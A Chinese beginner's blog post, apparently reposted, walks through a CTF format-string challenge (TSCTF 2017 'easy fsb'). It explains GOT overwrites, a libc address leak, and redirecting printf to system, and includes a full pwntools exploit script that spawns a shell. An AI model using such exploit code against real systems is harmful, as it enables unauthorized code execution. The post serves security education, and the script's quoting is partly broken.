首页 > 代码库 > pwn学习之二

pwn学习之二

  刚刚开始学习pwn,记录一下自己学习的过程。

  今天get了第二道pwn题目的解答,做的题目是2017年TSCTF的easy fsb,通过这道题了解了一种漏洞和使用该漏洞获取shell的方法:即格式化字符串漏洞,通过找到printf的got表改为system的got表,从而让执行printf函数变成执行system函数再传入/bin/sh参数,从而让程序执行system(‘/bin/sh‘)获取shell。

  打开ida查看:

  技术分享

  程序逻辑就是执行getname()函数。

  进入getname()函数:

  技术分享

  逻辑就是往buf里面写数据然后printf出来,这里由于printf()函数直接调用了buf作为参数,所以存在格式化字符串漏洞。

  格式化字符串漏洞介绍:http://www.cnblogs.com/Ox9A82/p/5429099.html,http://blog.csdn.net/prettyday/article/details/50366608。

  本题漏洞利用方法:首先第一轮将exit函数的got表修改成main函数的地址从而让程序能够循环运行,

              接着第二轮将__libc_start_main函数在内存中的地址找出,通过给的so文件计算出system函数地址,

            第三轮将printf函数的got表更改为system函数的地址,

              最后一轮输入‘/bin/sh\x00‘,实际是运行了system(‘/bin/sh‘),最终拿到了shell。

  通过gdb查看,由于本题未使用保护措施,可以直接通过ida读取到地址(linux加载器分配虚拟页的一个连续的片从0x08048000开始,也就是说elf程序的默认起始地址为0x08048000,之前一直不懂为什么加载前后地址是固定的^_^|||),设置断点在存在格式化字符串漏洞的printf位置处,本题为b *0x08048629,然后r运行,输入AAAA,再通过stack 10来查看当前栈:

技术分享

可以看出输入值在栈顶偏移7的位置。

可以通过pwntools中的fmtstr模块来快速生成payload,如要将exit_got表的地址改为main函数的地址:

 main_addr = 0x8048648

 exit_got = 0x804a024

 fmtstr_payload(7,{exit_got:main_addr})

这样就生成了

技术分享

这样的payload,什么意思呢:

首先,我们知道字符串存在栈中偏移为7的位置,所以这个payload首先在偏移为7的位置写下了0804a024,偏移为8的位置写着0804a025,同理到偏移为10的地址写着0804a027,其实这就是exit_got表的地址所占的4个字节,%x$hhn是将前面的字符个数作为值存入到偏移为x的地方写的地址中,比如这里%7$hhn就会把前面的字符个数作为值写入0804a024这个地址处,所以这里是把56+16存入0804a024中,把56+16+62存入0804a025中,把56+16+62+126存入0804a026中,把56+16+62+126+4存入0804a027中,这里注意:最高是255所以超过的其实是值-256存入,其实这里就是把48,86,04,08分别存入0804a024到0804a027中。

改完了,就能让程序在结束时循环到开始处,然后就是通过so文件和__libc_start_main函数的真实地址找出system函数的真实地址,通过ida可以找到__libc_start_main函数的got表地址是0804A028,它的真实地址就是0804A028地址处存着的值,可以通过构造payload:\x28\xa0\x04\x08%7$s来获得,然后根据so文件中__libc_start_main函数和system函数的间隔通过__libc_start_main函数真实地址-so文件中的__libc_start_main函数地址+so文件中的system函数地址即可得到system函数的真实地址。

第三次执行,将得到的system函数的真实地址写入printf函数的got表中,方法同第一步。

最后一次执行,运行到printf函数传参数时,实际上是给system函数传入参数,所以传入/bin/sh即可执行system(‘/bin/sh‘)从而拿到shell。

fsbpwn.py

 1 from pwn import *
 2 #init
 3 debug = 0
 4 if debug:
 5     io = process(./fsb)
 6 else:
 7     io = remote(127.0.0.1,2336)
 8 
 9 context.log_level = debug
10 
11 if debug:
12     gdb.attach(pidof(fsb)[-1],open(aa))
13 #-------------------------------------------------
14 main_addr = 0x8048648
15 exit_got = 0x804a024
16 
17 io.recvuntil("Welcome~\n")
18 payload1 = fmtstr_payload(7,{exit_got:main_addr})
19 io.sendline(payload1)
20 
21 #-------------------------------------------------
22 libc_path = ./libc-32.so
23 libc = ELF(libc_path)
24 libc_start_main_got = 0x804A028
25 io.recvuntil("Welcome~\n")
26 io.sendline(p32(libc_start_main_got)+%7$s)
27 libc_start_main = u32(io.recv(8)[4:8])
28 
29 print libc_start_main
30 system_addr = libc_start_main - libc.symbols[__libc_start_main] + libc.symbols[system]
31 print system_addr =  + hex(system_addr)
32 
33 #-------------------------------------------------
34 printf_got = 0x804a014
35 io.recvuntil("Welcome~\n")
36 
37 payload2 = fmtstr_payload(7,{printf_got:system_addr})
38 io.sendline(payload2)
39 
40 #-------------------------------------------------
41 io.recvuntil("Welcome~\n")
42 io.sendline("/bin/sh")
43 
44 io.interactive()

pwn题目可用:socat tcp4-listen:2336,fork exec:./pwn1挂载,然后通过nc ip 2336去访问

fsb下载地址:http://files.cnblogs.com/files/lllkh/pwn1.rar

 

pwn学习之二